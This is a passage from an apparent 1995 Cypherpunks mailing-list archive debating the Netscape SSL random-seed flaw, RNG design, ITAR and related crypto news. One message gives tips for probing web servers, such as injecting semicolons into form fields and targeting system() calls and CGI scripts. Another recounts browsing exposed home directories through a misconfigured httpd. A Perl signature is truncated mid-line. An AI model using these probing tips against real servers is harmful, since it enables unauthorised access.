up my drive. If >> it's worth saying, then *say* it. >I really don't know why any mailers call a monopart MIME message an >"attachment". Mail readers come in three basic flavors of unMIMEificationness: 1) Ignorance+bliss - the mailer doesn't know or care about MIME headers, and you can ignore them when you read them, and may be able to configure the reader not to bother you with most of them (e.g. BSD Mail.) 3) Intelligence - the mailer does something genuinely useful to help you read the attachment, like letting you pop up some appropriate reading tool. 2) Naive friendliness - the Sirius Cybernetics approach. "Your mail file has been tastefully shredded into little pieces and sprinkled around your disk drive. Thank you for making a humble mail system so _very_ happy." Free Eudora versions offer you several choices of tastefulness and shredditude, partly intended to provide artistic functionality and partly to encourage you to buy the commercial version which gives you a more flexible user interface for extensions like MIME. So buy it, or cope with it, or tell Eudora to use your RAMdisk for its attachments where they'll soon go away and not bother you. There's also another approach, typified by a vendor whose name will be omitted but they'd know who they were if they had a clue.... 0) Downright hostile - Not only does it _pretend_ to be Intelligent, while only really doing the right thing with its own proprietary data formats*, though generally doing something reasonable with uuencoded documents with names that it understands, but it chokes and dies on messages that have even moderately large amounts of simple, basic, non-attachmentized _text_, and if you _do_ try to package text up to send to some poor sucker who's stuck with one of these systems, it hands it to a brain-damaged user-friendly mouse-editor that _also_ chokes on more than 64KB of text.... [* where "the right thing" allows it to mindlessly run arbitrary code handed to it as macros in the proprietary data formats that the company encourages its users to use instead of real text....] #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:11 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:11 PDT Subject: NYT on Netscape Crack Message-ID: <199509190929.CAA23992@ix.ix.netcom.com> > The New York Times, September 19, 1995, pp. A1, D21. > ...... > "The good news and the bad news of the Internet is that > when you put something up there, many more people can test > it," said Mike Homer, the vice president of marketing at > Netscape. "You also give yourself the opportunity of having > people point things out which you can fix quickly." That's a good, and realistic, attitude. > Netscape officials said today that they would strengthen > the system, by making it significantly harder to determine > the random number at the heart of their coding system. They > said they would no longer disclose what data would be used > to generate the random numbers. I do hope this is just John Markoff's simplification of what Netscape's folks said and not an endorsement of security-by-obscurity. I realize that some data does need to be kept around on disk or in the program, since obtaining a lot of random bits at the beginning of every transaction either requires annoying user interactions or takes too long to get decent quality, and certainly this data ought to be kept private by the algorithms involved. One concern I've had about the popular "crunch some bits repeatedly through MD5" approach to random number generation is that knowing one sample from the stream (e.g. by doing a transaction with the victim) gives you the rest of the stream. There's a way to improve that. let X(0) be some number you keep around from a previous session, modified by whatever hardware randomness is available, and seeded by user input the first time. let X(i) = MD5(X(i-1)) let Y(i) = hash(X(i)), where hash is something like MD5(key,X(i)) use Y(i) as the output random number. This eliminates the ability to determine X(i) or Y(i+1) as a function of Y(i), since the search space of X(i) is presumably too large to reverse (unlike the number of bits you can cheaply get in one session). Keeping some of the bits of Y(i) around to use in addition to the other key for the hash, or to key the MD5(X(i-1)) with, may be useful as well. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:13 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:13 PDT Subject: Caribbean Internet Services? (fwd) Message-ID: <199509190929.CAA23997@ix.ix.netcom.com> Tim wrote: >>> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than >>> they were a few months ago. The governments of the affected islands will have to make some tradeoffs - do they allow providers of these services to operate freely, bringing in new telecomm facilities so they can get the revenues from (let's keep the Minnesota AG happy) gambling and other private-communications trade, or do they leave their telecomm monopolies in place, so they can get the telecomm revenues which get into government coffers more quickly? Is there enough market to convince them to open up, which will attract more services? How much does being first matter? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:19 PDT Subject: Time release crypto Message-ID: <199509190930.CAA24047@ix.ix.netcom.com> >>What minimal requirements would be needed to support encrypted packets/files >>that a holder could only decrypt after a certain date/time? Technology can't solve the problem, only help a bit; algorithms aren't timebound. In particular, true security depends on only being able to decrypt if you have the correct information, and there's no way to create decryption information in the future from encryption pieces you have now without being able to create the same information now. Tim's 1993 article suggests spreading data around with > independent escrow agents who handle large volumes of messages > and agree to hold them for various amounts of time. and depending on reputations and market forces to ensure honesty. > The decryption key to the original message is itself broken >up into several or many pieces and scattered to a network of >"remailer"-like agents (they are essentially "remailers into the future," >by agreeing as part of their protocol to hold messages for some amount of time). What Tim almost, but not quite, mentions here is Shamir Secret Sharing - you can split messages into N pieces, of which any M can reconstruct the message and any M-1 don't contain enough information to resolve their equations uniquely, leaving you with _no_ known correct bits. Tim's message also talked about having lots of data flowing around in a remailer-like fashion, but that may not be untraceable by subpoenas, #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:55:00 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:55:00 PDT Subject: Fundamental Netscape hack Message-ID: <199509190954.CAA24686@ix.ix.netcom.com> Of course, one of the most serious security problems with Netscape servers is that they run on machines sitting out there on the Internet where anybody who can browse their services can attack them - that 128-bit bullet-proof iron-clad front door isn't much help if the garage door is unlocked because of some sendmail bug. For most web applications, the big security need is to send a chunk of encrypted data to some server that will decrypt it and get you credit-card number or whatever, but the standard SSL and S/HTTP protocols want to decrypt the data to plaintext on the Web server before it can do anything like that. (OK, I guess this doesn't win me a T-Shirt, since enough other people have said similar things, but do I at least get a gif of the shirt and a crayon so I can roll my own? :-) Good work, folks! #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From eay at mincom.oz.au Tue Sep 19 03:16:22 1995 From: eay at mincom.oz.au (Eric Young) Date: Tue, 19 Sep 95 03:16:22 PDT Subject: NYT on Netscape Crack In-Reply-To: <43lu3k$7q6@tera.mcom.com> Message-ID: On 19 Sep 1995, Jeff Weinstein wrote: > In article <199509190355.XAA01329 at frankenstein.piermont.com>, perry at piermont.com (Perry E. Metzger) writes: > > I suspect that there are far more flaws in Netscape. String buffer > > overflows are another good guess here -- they are probably rampant > > through the code both for the browser and the commerce server they .... > Sigh. For your information the security code for 1.x versions of > netscape was not even written by someone from NCSA. The current > security team (which does not include the person who did the 1.x > version) also does not include anyone from NCSA. While I can't I will defend Netscapes code on the point about the RNG even though I have not seen any. I assume the Netscape code is quite large and each release would have to pass various fuctionality tests. How can you test that the RND seeding is wrong? You have to actually look at the code, the number coming out are still random. As of last week I was told by Mike_Spreitzer.PARC at xerox.com that the random number generator seed routine in my DES library was only copying in 4 bytes of passed data instead of 8. Given des_cblock data;, it was memcpy(init,data,sizeof(data)); it should have been memcpy(init,data,sizeof(des_cblock)); Rather hard to notice unless you know that des_cblock is passed as a pointer and even this can be compiler dependent. Now I had not noticed this, my library runs like a charm and things appear random from the random number generator. This sort of error can only be checked by reading the code and specifically looking at critical routines like this the RNG seeding routines. The advantage of my code being public is that some-one like Mike can have a look and pick up problems like this. The moral of the story I suppose is to be paranoid about checking routines relating to RNG. What would be interesting is to see if packages like PEM use similar simple systems for generating random data. Any of the systems that do digital envelopes are relying on libraries to provide random data for encryption keys. At least with the old 'enter passwd' type encryption there was a bit of secret random data coming from a human, pitty about packet watchers seeing those characters as they fly over the net :-) eric (who has also been burned by dodgy RNG seed routines in the past and so now uses a rather extrem system involving MD5 and lots of state :-). -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From descarte at mcqueen.com Tue Sep 19 03:37:34 1995 From: descarte at mcqueen.com (descarte at mcqueen.com) Date: Tue, 19 Sep 95 03:37:34 PDT Subject: Quick ITAR question.... Message-ID: <199509191040.LAA13613@alma.mcqueen.com> I've just about finished the perl SSLeay implementation and I was musing about how I would manage to do one for SSLref also....... Here's the situation: I'm in Britain, but I have access to a machine which I wll develop on in the States. Can I develop Net::SSLref on this machine? My feeling is, no, since I'm not a US citizen ( does this matter with ITAR? ). Similarly, it could be construed that the characters constituting the source code are crossing the Atlantic to my machine here, albeit not being stored. Conversely, I'm not reading *all* the code, so I couldn't necessarily build SSLref from this action ( a parallel may be the export of 1/723 of PGP in a .sig! ) Any comments would be much appreciated. Thanks. -- Alligator Descartes | PGP Key available on request. descarte at mcqueen.com | http://www.mcqueen.com/hermetica From aba at dcs.exeter.ac.uk Tue Sep 19 04:12:01 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 19 Sep 95 04:12:01 PDT Subject: NYT on Netscape Crack Message-ID: <28592.9509191106@exe.dcs.exeter.ac.uk> Eric Young writes: > I will defend Netscapes code on the point about the RNG even though > I have not seen any. I assume the Netscape code is quite large and > each release would have to pass various fuctionality tests. How can > you test that the RND seeding is wrong? You have to actually look > at the code, the number coming out are still random. As of last > week I was told by Mike_Spreitzer.PARC at xerox.com that the random > number generator seed routine in my DES library was only copying in > 4 bytes of passed data instead of 8. Given des_cblock data;, it was > > memcpy(init,data,sizeof(data)); > > it should have been > > memcpy(init,data,sizeof(des_cblock)); > > Rather hard to notice unless you know that des_cblock is passed as a > pointer and even this can be compiler dependent. Sure that's hard to notice, but what you describe was an accident, ie the code wasn't working as you thought it was. The netscape one by the sound of it, and the earlier posts of the reverse-engineered ran no code, was working to spec, it was just a dumb spec. I felt sorry for netscape when they got chosen as the example of an ITAR crippled app to break, the breakers intention obviously being to tar ITAR, but some of the bad publicity rubbing off on netscape, who were obviously fully aware of the weakness of 40 bit keys. This one tho' sounds very much like due to sloppy design which is inexcusable, especially given that they are going around selling the 128 bit RC4 browser to people who may have been relying on it, at it's word, and presume the rest of the cryptographic system was up to suitable standard to match 128 bit keys. aka what's the point having 128 bit keys if you use a 32 bit, or 40 bit or 48 bit seed, which can be further narrowed with non-root access to the machine, and even with external info leaked by the machine. > The moral of the story I suppose is to be > paranoid about checking routines relating to RNG. Well that is a valid, and very good moral, but the netscape story is a different story I think, as they knew what their code was doing, and somehow didn't think it was a problem, or didn't even pause to consider the ran no generation security. Reckon any bad publicity they get out of this one is entirely their own fault. The moral in netscapes story is that closed systems are bad news. These things ideally need open review. And of course designing things with the expectation that they are secure with the *given* that the full algorithm is known. Real shame because the rest of the software is very innovative compared to other browsers, and apparently good quality. Also may be a set back for net commerce, which is bad news. Adam -- Munitions-T home page: http://www.obscura.com/~shirt/ #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 Message-ID: On the 18th, Tim May wrote: > > I wasn't saying they are all on the same footing, or are all separate and > compartmentalizable things. Clearly some of them are just slightly > different "flavors" of other things. I listed a bunch of them not as a > taxonomy or ontology, but as an illustration that there are many kinds of > financial dealings, many kinds of roles played. > > That the real world has so many flavors of financial things could of course > be due to inertia and ignorance, partly. But there are also different > functionalities, and costs. Fitting the different needs, the different > roles of the players. I won't go on and on, as my last post on this I think > hit the main points, but consider how many flavors we have just of > "checks": the "ordinary" checks we write, counter checks, dual-endorser > checks, traveller's checks, and so on. (If you are arguing that only > "digital cash" is a real issue, and all other constructs are "small matters > of programming," then we disagree profoundly.) My mistake then. You obviously have in mind some things much more subtle and more logically removed from money, or currency, or even liquidity than what I thought you were referring to. I'm going back to reading the list in the mornings. --PJ . . . . > --Tim May > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > From m5 at dev.tivoli.com Tue Sep 19 05:40:36 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Tue, 19 Sep 95 05:40:36 PDT Subject: NYT on Netscape Crack In-Reply-To: <43lu3k$7q6@tera.mcom.com> Message-ID: <9509191238.AA09042@alpha> Eric Young writes: > > Sigh. For your information the security code for 1.x versions of > > netscape was not even written by someone from NCSA. The current > > security team (which does not include the person who did the 1.x > > version) also does not include anyone from NCSA. While I can't > > I will defend Netscapes code on the point about the RNG even though I > have not seen any. I assume the Netscape code is quite large and each > release would have to pass various fuctionality tests. How can you test > that the RND seeding is wrong? The seeding isn't "wrong"; it's a design flaw. (At least that's my understanding; maybe I missed something.) > You have to actually look at the code, the number coming out are > still random. Two words: "design review". > This sort of error can only be checked by reading the code and > specifically looking at critical routines like this the RNG seeding > routines. Uhh... OK. Sounds like a plan to me. For critical pieces of code like that, having repeated exhaustive design/implementation reviews should be a matter of course. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From schneier at winternet.com Tue Sep 19 05:57:40 1995 From: schneier at winternet.com (Bruce Schneier) Date: Tue, 19 Sep 95 05:57:40 PDT Subject: Errors in Applied Cryptography, 2nd Edition Message-ID: <199509191257.HAA09502@icicle> I have taken a three stage approach to reducing the number of errors in the second edition: 1. Correct the errors from the first edition. 2. Ensure that I don't create any new errors while writing the new material for the second edition. 3. Make sure that additional errors don't creep in during the production of the second edition. In order.... I have done a lot more than incorporate all the corrections from the errata into the second edition. Minor things, too trivial to make the errata list, were also corrected. The first edition was translated into French, and the translator sent me hundreds of queries: things that were unclear, ambiguous, or erroneous. All of those queries resulted in changes to the second-edition manuscript. I was a lot more careful adding new material, reading it over several times to ensure accuracy. And a lot of other people read the chapters over, too. For the first edition, I asked about a dozen people to proofread the manuscript for me. Most people read the first chapters carefully, and then petered out somewhere in the middle. This time I asked about seventy people to each read a chapter (or two)--a chapter within their area of expertise. Each chapter was edited by at least two people, often more. Additionally, two people were paid to read the entire book for accuracy and comprehensibility. I learned a lot about the publishing process during the production of the first edition. For the first edition, I had no control of any of the production decisions. The copyeditor added errors to the manuscript. Some computer idiot lost all of my italics, boldface, superscripting, and subscripting while translating my files from my word processor to their page layout program. The proofreader didn't catch errors that the production people added. I had almost no time to review the manuscript at any of the stages. This time around I was able to choose my own copyeditor, proofreader, and indexer. In fact, there were two separate rounds of copyediting with two different copyeditors. The proofreader is not only the most meticulous proofreader I know, but someone who knows enough math to catch errors in the equations. I verified all file translations myself. And I reviewed the copyedited manuscript twice, and two separate passes of page proofs. I'm not stupid enough to state that the book is 100% error-free, but I am confident that there are far fewer errors in the second edition than there were in the first. I was embarrassed at some of the errors in the first edition, and I put a lot of effort into making sure it doesn't happen again. Bruce ************************************************************************** * Bruce Schneier * Counterpane Systems For a good prime, call 391581 * 2^216193 - 1 * schneier at counterpane.com ************************************************************************** From jya at pipeline.com Tue Sep 19 06:30:58 1995 From: jya at pipeline.com (John Young) Date: Tue, 19 Sep 95 06:30:58 PDT Subject: Unabomber ? Message-ID: <199509191330.JAA13584@pipe4.nyc.pipeline.com> Bill, Both the Times and Post report that only the Post is publishing the FC-piece. I'm scanning it now and will offer it in a while -- it's a long, long pole. I'll ask by this post if someone wants to offer it FTP, I can only do multiple e-mail bites from this hole. From frissell at panix.com Tue Sep 19 06:36:44 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Sep 95 06:36:44 PDT Subject: NYT on Netscape Crack Message-ID: <199509191336.JAA14981@panix.com> At 11:00 PM 9/18/95 -0400, John Young wrote: > The New York Times, September 19, 1995, pp. A1, D21. > > > Security Flaw Is Discovered In Software Used in Shopping > > By John Markoff On the Front Page, *above* the fold. Perhaps John was trying to make up for being scooped by the WSJ on the SSL Crack story. DCF "The key to the age may be this, or that, or the other, as the young orators describe; the key to all ages is-Imbecility; imbecility in the vast majority of men, at all times, and, even in heroes, in all but certain eminent moments; victims of gravity, custom, and fear." -- Ralph Waldo Emerson From adam at homeport.org Tue Sep 19 06:49:50 1995 From: adam at homeport.org (Adam Shostack) Date: Tue, 19 Sep 95 06:49:50 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190713.AAA01128@infinity.c2.org> Message-ID: <199509191349.JAA04365@homeport.org> | Buffer overflow seems like a much greater concern when dealing | with a server. Particularly one which is supposedly "secure", and | accessing "secured" documents. Even with the server running as | 'nobody' if someone can implement buffer overflow to get access to | documents they shouldn't then that would count as a pretty significant | hack. Don't forget system(), which was a major source of holes in the NCSA server. Also, CGI scripts, especially those that run under perl or sh, would be a good place to look for holes. Don't forget to see what happens when you put semi-colons in the data field of various fields, such as mailto:'s. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From sameer at c2.org Tue Sep 19 07:00:23 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:00:23 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509191349.JAA04365@homeport.org> Message-ID: <199509191355.GAA26932@infinity.c2.org> > Don't forget system(), which was a major source of holes in the NCSA server. > Also, CGI scripts, especially those that run under perl or sh, would be a good > place to look for holes. Don't forget to see what happens when you put > semi-colons in the data field of various fields, such as mailto:'s. > A CGI-script hole doesn't count as a netscape server hole. system() is probably pretty bad though. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Tue Sep 19 07:08:27 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:08:27 PDT Subject: NYT on Netscape Crack In-Reply-To: <28592.9509191106@exe.dcs.exeter.ac.uk> Message-ID: <199509191403.HAA27655@infinity.c2.org> > > Sure that's hard to notice, but what you describe was an accident, ie > the code wasn't working as you thought it was. > Also, the fact that the source isn't available meant that it took quite some work to reveal the hole. In Eric's case, with available source, his mistake was found and corrected. > > The moral in netscapes story is that closed systems are bad news. > These things ideally need open review. And of course designing things > with the expectation that they are secure with the *given* that the > full algorithm is known. Yes. > > Real shame because the rest of the software is very innovative > compared to other browsers, and apparently good quality. Also may be > a set back for net commerce, which is bad news. > Well if we hammer at 'em enough maybe they'll get their security fixed. I still use netscape. I'm not going to stop using netscape. (I'm not going to use netscape for anything sensitive though, that's for sure.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From keelings at wu1.wl.aecl.ca Tue Sep 19 07:28:57 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Tue, 19 Sep 95 07:28:57 PDT Subject: Time release crypto Message-ID: <9509191427.AA23942@wu1.wl.aecl.ca> Incoming from Stephen D. Williams: > > What minimal requirements would be needed to support encrypted packets/files > that a holder could only decrypt after a certain date/time? > (Time Escrow?) How do you expect the system to reliably tell accurate time? What's to stop anyone from just resetting the clock to get at what they want? As always, physical access to the system breaks all security. -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs From dl at hplyot.obspm.fr Tue Sep 19 07:32:20 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 19 Sep 95 07:32:20 PDT Subject: (Yet Another?) Netscape Crack Web page Message-ID: <9509191431.AA23188@hplyot.obspm.fr> I've been waiting to see here an annoucement of some web page toward which direct ppl that want more infos on the great (congrats) job from Ian and David, but as I saw none (maybe it's on its way, delay seem pretty high those days on the list mail, in that case, sorry...) and someone asked me more infos, on my sources,... I've set up a small web pages with some infos collected here on http://hplyot.obspm.fr/~dl/netscapesec/ It includes few remote pointers, a copy of the original ian's post, the NYT article, the Wall Street journal one, and... the source file that I received from an european source (and incidently a summary from me in french) Please send me comments , corrections, additional pointers,... (it is not meant to ne exhaustive anyway) Best regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From eli at UX3.SP.CS.CMU.EDU Tue Sep 19 07:38:57 1995 From: eli at UX3.SP.CS.CMU.EDU (Eli Brandt) Date: Tue, 19 Sep 95 07:38:57 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com> Message-ID: <9509191438.AA16172@toad.com> > The New York Times, September 19, 1995, pp. A1, D21. ... > Netscape officials said today that they would strengthen > the system, by making it significantly harder to determine > the random number at the heart of their coding system. They > said they would no longer disclose what data would be used > to generate the random numbers. and from the WSJ article: > "The information we were using to create the key is now a known set of > information," said Jeffrey Treuhaft, security product manager for Netscape. It sounds as if Netscape thinks that public knowledge of the key generation is part of the problem. I hope somebody on the security team convinces management that entropy is more important than publicity. (This could be a result of journalistic cluelessness, but it came up in two independent articles. It's enough to worry me.) -- Eli Brandt eli+ at cs.cmu.edu (back from a nice long mailing-list vacation -- it's nice to see that cpunks is still at the cutting edge. for them what cares, I'm now a Ph.D. student at the CMU CS program...) From sameer at c2.org Tue Sep 19 07:40:31 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:40:31 PDT Subject: articles Message-ID: <199509191435.HAA00275@infinity.c2.org> If you could, please send me the name of the reporter and contact information for any articles you see regarding the netscape hack. Thanks, -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From patrick at Verity.COM Tue Sep 19 07:44:14 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Tue, 19 Sep 95 07:44:14 PDT Subject: Caribbean Internet Services? Message-ID: <9509191440.AA13167@cantina.verity.com> > (Yes, there have been more hurricanes this year than in most years...not > clear if it's just a Poisson fluctuation, or symptomatic of deeper weather > pattern changes.) > See September 95 Popular Science, article, "Hurricane Alert" in which the worlds leading hurricane scientist says that we're only just seeing the beginning of several years of large numbers of large hurricanes. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From sameer at c2.org Tue Sep 19 07:44:49 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 07:44:49 PDT Subject: Fundamental Netscape hack In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com> Message-ID: <199509191439.HAA00501@infinity.c2.org> > (OK, I guess this doesn't win me a T-Shirt, since enough other people > have said similar things, but do I at least get a gif of the shirt > and a crayon so I can roll my own? :-) Good work, folks! GIFs of the shirt will be available on the web page as soon as they are designed. (Times like these make me wish I owned a mac.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From cme at TIS.COM Tue Sep 19 07:49:51 1995 From: cme at TIS.COM (Carl Ellison) Date: Tue, 19 Sep 95 07:49:51 PDT Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar In-Reply-To: <199509182322.QAA03984@comsec.com> Message-ID: <9509191440.AA18495@tis.com> >From: Rich Salz >Date: Mon, 18 Sep 1995 13:11:46 -0400 > >Would someone from outside the US try to download the above file? >It would be, at least, amusing if an Air Force site were in violation >of the ITAR (their README notwithstanding). I know several people in the armed forces who are firmly on our side rather than Freeh's or NSA's -- so I wouldn't find it amusing to get a USAF person in trouble just because he/she is USAF. - Carl From cme at acm.org Tue Sep 19 07:50:29 1995 From: cme at acm.org (cme at acm.org) Date: Tue, 19 Sep 95 07:50:29 PDT Subject: Intellectual Property and Crypto collision In-Reply-To: <199509182307.QAA03892@comsec.com> Message-ID: <9509191443.AA22130@tis.com> >Date: Sun, 17 Sep 1995 13:20:06 -0700 >From: John Gilmore > >> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW >> A presidential task force has recommended that electronic transmission of [...] > >Would this make it illegal to produce tools for decrypting key-escrowed >software? :-) Yup -- except you will have volunteered. See the Feynman account (citation in http://www.clark.net/pub/cme/html/censor.html ) - Carl From sdw at lig.net Tue Sep 19 08:25:27 1995 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 19 Sep 95 08:25:27 PDT Subject: Unabomber ? In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com> Message-ID: Yep, it's big. 26 sections, 232 paragraphs, 36 notes, and one diagram. 8 full newspaper pages in 5 column standard print (10 point?), ragged. Read the first page before work. > Bill, > > > Both the Times and Post report that only the Post is publishing > the FC-piece. > > > I'm scanning it now and will offer it in a while -- it's a > long, long pole. > > > I'll ask by this post if someone wants to offer it FTP, I can > only do multiple e-mail bites from this hole. > sdw From frissell at panix.com Tue Sep 19 08:29:34 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Sep 95 08:29:34 PDT Subject: Cypherpunks Hold a Cracking Party Message-ID: <199509191529.LAA14949@panix.com> Just to let everyone know that I've got an assignment from Wired to do a story with the above working title. Since Wired is monthly it will be feature rather than news but will give a bit of an inside look at the process. I will be hitting various people up for help and would appreciate it if you send any URLs on the SSL and other such cracks to me. DCF "The freedom of the press belongs to the man who owns one." From frissell at panix.com Tue Sep 19 08:31:38 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Sep 95 08:31:38 PDT Subject: (Yet Another?) Netscape Crack Web page Message-ID: <199509191529.LAA14933@panix.com> At 04:31 PM 9/19/95 +0200, Laurent Demailly wrote: > >I've been waiting to see here an annoucement of some web page toward >which direct ppl that want more infos on the great (congrats) job Here are some URLs I've collected: http://pauillac.inria.fr/~doligez/ssl/press-conf.html SSL challenge virtual press conference http://www.brute.cl.cam.ac.uk/users/pb/ Piete Brooks home page http://dcs.ex.ac.uk/~aba/ Adam Back's home page http://dcs.ex.ac.uk/~aba/brutessl/ Index of /~aba/brutessl/ http://www.brute.cl.cam.ac.uk/brute/ brute page DCF From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 08:38:28 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 08:38:28 PDT Subject: NYT on Netscape Crack Message-ID: <9509191537.AA00830@ch1d157nwk> John Markoff in the NYT said: > The company said it would release a repaired version of the > software within a week. Does this sound to anyone else like a pretty short amount of time to code and test a decent source of entropy for the PRNG? <...and someone else said it should be out in a day or so!> Jeff Weinstein writes: > Regardless of what Markoff implies, we do not intend to depend > on security through obscurity. Oh, can we now expect to see source to at least the security portions of Navigator and the Commerce server? andrew From tbyfield at panix.com Tue Sep 19 08:44:18 1995 From: tbyfield at panix.com (t byfield) Date: Tue, 19 Sep 95 08:44:18 PDT Subject: WebSTAR "challenge" Message-ID: >From TidBITS#295/18-Sep-95 >**This is a test. This is only a test.** The folks behind the book > _WebMaster_Macintosh_ have set up a contest to determine how > secure Macintosh web servers really are. They've put up a Web site > running WebSTAR with a "target" file that contestants must try to > retrieve. The first person to retrieve the file wins a year's > subscription to MacTech Magazine and a free pass to the next > WebEdge conference, and the next two people receive free WebEdge > passes. If the challenge of breaking WebSTAR's security isn't > sufficient, there's a second Mac connected to the first via > Ethernet. This second Mac doesn't run TCP/IP, only AppleTalk, and > holds a second target file; retrieving it wins you three free > WebEdge passes. The hope is that these tasks will prove > impossible, however, should someone break in, that's also useful > since it will help StarNine and Apple plug security holes. Contest > rules and details are at: [ACE] > >http://www.webmastermac.com/security/ From hallam at w3.org Tue Sep 19 08:49:43 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 19 Sep 95 08:49:43 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190703.DAA03247@clark.net> Message-ID: <9509191548.AA17659@zorch.w3.org> I take a long term view of security. Basically I don't trust security software until it has been released in a stable condition for a few years. The comments about Credit Card numbers miss the point. The volumes of trade on the Internet today are so small that the number of card numbers floating arround is insignificant. There are much easier ways to find them than cracking the Internet. This will not be the case in a couple of years time where the trade volumes are far higher. Visa and Mastercard will be comming out with a spec which will have very tight requirements for implementations. Phill From hfarkas at ims.advantis.com Tue Sep 19 08:53:18 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Tue, 19 Sep 95 08:53:18 PDT Subject: Fundamental Netscape hack In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 19 Sep 1995, Bill Stewart wrote: > Of course, one of the most serious security problems with Netscape servers > is that they run on machines sitting out there on the Internet where > anybody who can browse their services can attack them - that 128-bit > bullet-proof iron-clad front door isn't much help if the garage door is > unlocked because of some sendmail bug. Or- even easier yet- improper httpd installation or users who have not been properly trained. NCSA's default configuration file makes document root a subtree. One major institution I deal with regularly (and the administrators should know better) changed the default setting, allowing users to store html files in their home directory. And, it seems, the file permissions were too lax. If a user had no index.html then I could just cruise through their home directory, view most files and, in some (inappropriate) cases, download them. I told the administrator, and mailed him a copy of a user's address book (she was a friend and knew what I was doing before I did it). The situation has changed and is now more secure. But I wonder how many other institutions have an inappropriate DocumentRoot so (I guess) users can have a "single home directory"? =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ 